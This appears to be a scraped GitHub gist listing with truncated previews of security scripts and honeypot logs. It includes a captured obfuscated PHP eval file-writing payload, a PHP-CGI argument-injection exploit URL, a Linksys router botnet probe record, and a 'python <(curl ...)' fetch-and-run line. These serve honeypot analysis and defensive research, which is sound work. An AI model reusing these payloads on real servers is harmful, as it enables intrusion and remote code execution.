195.154.183.187 - - [12/Jun/2016 18:46:03] "coco=%40eval%2f**%2f(%24%7b%27_P%27.%27OST%27%7d%5bz9%5d%2f**%2f(%24%7b%27_POS%27.%27T%27%7d%5bz0%5d))%3b&z9=BaSE64_dEcOdE&z0=QGluaV9zZXQoImRpc3BsYXlfZXJyb3JzIiwiMCIpO0BzZXRfdGltZV9saW1pdCgwKTtAc2V0X21hZ2ljX3F1b3Rlc19ydW50aW1lKDApOyRucGF0aD0kX1NFUlZFUlsnRE9DVU1FTlRfUk9PVCddLkJhU0U2NF9kRWNPZEUoJF9HRVRbJ3o0J10pO2Z1bmN0aW9uIGNyZWF0ZUZvbGRlcigkcGF0aCl7aWYoIWZpbGVfZXhpc3RzKCRwYXRoKSl7Y3JlYXRlRm9sZGVyKGRpcm5hbWUoJHBhdGgpKTtta2RpcigkcGF0aCwgMDc3Nyk7fX1jcmVhdGVGb2xkZXIoJG5wYXRoKTtlY2hvKCItPnwiKTs7JGM9JF9QT1NUWyJ6MiJdOyRmPSRucGF0aC5CYVNFNjRfZEVjT2RFKCRfR0VUWyJ6MyJdKTskYz1zdHJfcmVwbGFjZSgiXHIiLCIiLCRjKTskYz1zdHJfcmVwbGFjZSgiXG4iLCIiLCRjKTskYnVmPSIiO2ZvcigkaT0wOyRpPHN0cmxlbigkYyk7JGkrPTIpJGJ1Zi49dXJsZGVjb2RlKCIlIi5zdWJzdHIoJGMsJGksMikpO2VjaG8oQGZ3cml0ZShmb3BlbigkZiwidyIpLCRidWYpPyIxIjoiMCIpOztlY2hvKCJ8PC0iKTtkaWUoKTs%3d&z2=393839303030300D0A3C3F706870200D0A246D756A6A203D20245F504F53545B277A275D3B2069662028246D756A6A213D222229207B202478737365723D62
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
#!/usr/bin/python | |
# This is a friendly reminder that you should lock your computer. | |
# | |
# Moves mouse cursor to random location and taunts the unsuspecting user | |
# | |
# | |
# Run like ninja: | |
# python <(curl -s https://gist.githubusercontent.com/dustyfresh/2b836ff3a207fc02f50105f5902db2f4/raw/91354fcb70b63fbd6eebf92da9dcd1608560729e/unlockedws.py) & | |
# | |
# <@dustyfresh> |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
#!/usr/bin/perl | |
######################################### | |
# Fierce v1.0.3 - Beta 03/23/2008 | |
# By RSnake http://ha.ckers.org/fierce/ | |
# Threading by IceShaman | |
# Zone transfer and additional patches by Jabra | |
######################################### | |
use strict; #warnings off after testing |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
#!/usr/bin/env python | |
# Thanks to PaulSec! (https://github.com/PaulSec/API-dnsdumpster.com) | |
import json | |
import argparse | |
from DNSDumpsterAPI import DNSDumpsterAPI | |
if __name__ == "__main__": | |
parser = argparse.ArgumentParser(description='dnsdumpster CLI client') | |
parser.add_argument('--domain', '-d', type=str, required=True, help='domain name to check') | |
args = parser.parse_args() |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
#!/usr/bin/env python | |
import requests | |
import re | |
def checkTor(ip): | |
headers = {'user-agent': 'checkTor'} | |
exit_nodes = requests.get('https://check.torproject.org/exit-addresses', headers=headers) | |
exit_nodes = exit_nodes.text | |
if re.search(ip, exit_nodes): | |
return True |
Payload found to be unrelated to WordPress. Seems to be trying to build a botnet by exploiting Linksys E-Series routers
> db.payloads.find({'ip': '179.158.120.213'}).pretty()
{
"_id" : ObjectId("576a421f83932a00168098be"),
"Tor" : false,
"ip" : "179.158.120.213",
"user-agent" : "Wget(linux)",
"triggered_url" : "http://178.62.224.8/hndUnblock.cgi",
> db.payloads.find({ip: '176.94.194.90'}).pretty()
{
"_id" : ObjectId("577f2c88247fe0000e2831a8"),
"Tor" : false,
"ip" : "176.94.194.90",
"user-agent" : "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)",
"triggered_url" : "http://178.62.224.8/phppath/php?-d+allow_url_include%3Don+-d+safe_mode%3Doff+-d+suhosin.simulation%3Don+-d+disable_functions%3D\"\"+-d+open_basedir%3Dnone+-d+auto_prepend_file%3Dphp%3A%2F%2Finput+-n",
"time" : "1467952264",
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
# Martian ranges | |
0.0.0.0/8 | |
10.0.0.0/8 | |
100.64.0.0/10 | |
127.0.0.0/8 | |
127.0.53.53 | |
169.254.0.0/16 | |
172.16.0.0/12 | |
192.0.0.0/24 | |
192.0.2.0/24 |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
#!/usr/bin/env python3 | |
from scapy.all import * | |
import logging | |
logging.getLogger("scapy.runtime").setLevel(logging.ERROR) | |
import re | |
def packet_callback(packet): | |
if packet[TCP].payload: | |
pkt = str(packet[TCP].payload) | |
if packet[IP].dport == 80: |